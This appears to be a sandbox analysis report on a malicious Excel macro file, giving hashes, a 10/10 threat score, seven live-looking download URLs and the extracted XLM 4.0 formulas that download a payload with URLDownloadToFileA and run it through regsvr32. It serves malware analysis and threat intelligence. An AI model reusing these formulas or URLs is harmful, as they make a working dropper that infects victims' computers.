Overview

overview

10

Static

static

10

971628ac87...0.xlsm

windows7-x64

10

971628ac87...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

  • Size

    37KB

  • Sample

    241120-zscksssfrd

  • MD5

    c48c0424f9a8fdcae930b8782d738017

  • SHA1

    97c3cecb4e447b4374e3ee5614458f5abecb2c88

  • SHA256

    971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

  • SHA512

    bb7239fe527e698d1e15846b1de55c2a06decf0c216b17095fcdc32f415324253afe7125a91cc262ca32a1473e2683b7ed0cc7fbd9829195ee6d9b71177d4981

  • SSDEEP

    768:5BnpO75ZJVzXxjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo1:30lpZOZZ1ZYpoQ/pMAQVr

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/

https://bigideas.com.au/images/w5FLAJPmvbk9/

https://webstream.jp/died-wing/oOzfVc/

https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/

https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/

https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/

https://breedid.nl/cgi-bin/aCbt/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/","..\dfeb.ses",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bigideas.com.au/images/w5FLAJPmvbk9/","..\dfeb.ses",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://webstream.jp/died-wing/oOzfVc/","..\dfeb.ses",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/","..\dfeb.ses",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/","..\dfeb.ses",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/","..\dfeb.ses",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://breedid.nl/cgi-bin/aCbt/","..\dfeb.ses",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfeb.ses") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/
xlm40.dropper

https://bigideas.com.au/images/w5FLAJPmvbk9/
xlm40.dropper

https://webstream.jp/died-wing/oOzfVc/
xlm40.dropper

https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/
xlm40.dropper

https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/
xlm40.dropper

https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/
xlm40.dropper

https://breedid.nl/cgi-bin/aCbt/

Targets

    • Target

      971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

    • Size

      37KB

    • MD5

      c48c0424f9a8fdcae930b8782d738017

    • SHA1

      97c3cecb4e447b4374e3ee5614458f5abecb2c88

    • SHA256

      971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

    • SHA512

      bb7239fe527e698d1e15846b1de55c2a06decf0c216b17095fcdc32f415324253afe7125a91cc262ca32a1473e2683b7ed0cc7fbd9829195ee6d9b71177d4981

    • SSDEEP

      768:5BnpO75ZJVzXxjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo1:30lpZOZZ1ZYpoQ/pMAQVr

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks